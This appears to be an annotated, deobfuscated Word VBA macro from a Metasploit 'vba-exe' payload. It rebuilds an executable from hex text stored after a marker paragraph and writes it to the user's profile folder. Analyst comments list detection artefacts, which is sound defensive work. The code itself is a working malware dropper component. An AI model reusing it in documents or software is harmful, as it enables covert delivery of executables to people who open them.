' This is a deobfuscated view of the 'vba-exe' output format of a Metasploit payload | |
' | |
' This macro searches for a marker paragraph ("marker" in the example below), | |
' then reads every paragraph that follows as a sequence of bytes and saves those | |
' bytes to a local file. | |
' | |
' Example, in the word document: | |
' marker | |
' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 .... | |
' DecodeAndSaveEmbeddedFile: rebuilds a binary file from text stored in the
' active Word document. Paragraphs are scanned in order; once a paragraph
' containing the literal "marker" has been seen, every later paragraph is read
' as back-to-back 4-character "&Hxx" tokens, each token is converted to one
' byte, and the bytes are appended to %USERPROFILE%\whatever.exe.
'
' Analyst notes (from the visible code only):
'  - The example bytes in the header (&H4d &H5a ...) are "MZ", the signature
'    that opens a DOS/PE executable, so the output is an executable image.
'  - This routine only writes the file; nothing in it launches the file. Any
'    execution step would live elsewhere in the original macro.
'  - Observable artefacts: an Office process creating an .exe directly under
'    the user profile directory, a document body holding long runs of "&Hxx"
'    text after a marker paragraph, and macro source that combines
'    Environ("USERPROFILE"), Open ... For Binary and Put.
Sub DecodeAndSaveEmbeddedFile() | |
Dim p As Paragraph | |
Dim Text As String | |
' Not assigned before the loop, so it starts at the VBA Boolean default (False).
Dim MarkerFound As Boolean | |
Dim Counter As Integer | |
Dim FileHandle As Integer | |
Dim b As Byte | |
Dim UserProfile As String | |
' The drop location is resolved from the USERPROFILE environment variable.
UserProfile = Environ("USERPROFILE") | |
FileHandle = FreeFile() | |
' The output file is opened before the marker search begins, so the file is
' created even when the document contains no marker paragraph.
Open UserProfile + "\whatever.exe" For Binary As FileHandle | |
For Each p In ActiveDocument.Paragraphs | |
' Yield to the host so Word stays responsive while the document is walked.
DoEvents | |
Text = p.Range.Text | |
If (MarkerFound = True) Then | |
' Payload paragraph: walk it in 4-character steps, one "&Hxx" token per step.
Counter = 1 | |
' NOTE(review): the strict "<" presumably relies on Range.Text ending with the
' paragraph mark, which leaves that final character out of the decode - confirm.
While (Counter < Len(Text)) | |
' Assigning the 4-character string to a Byte relies on VBA's implicit
' string-to-number conversion, which accepts the "&H" hexadecimal prefix.
b = Mid(Text, Counter, 4) | |
' The record number is omitted, so each Put writes at the current file position.
Put #FileHandle, , b | |
Counter = Counter + 4 | |
Wend | |
' The marker paragraph itself is never decoded: it only flips the flag, and
' decoding starts with the next paragraph.
ElseIf (InStr(1, Text, "marker") > 0 And Len(Text) > 0) Then | |
MarkerFound = True | |
End If | |
Next | |
Close #FileHandle | |
End Sub |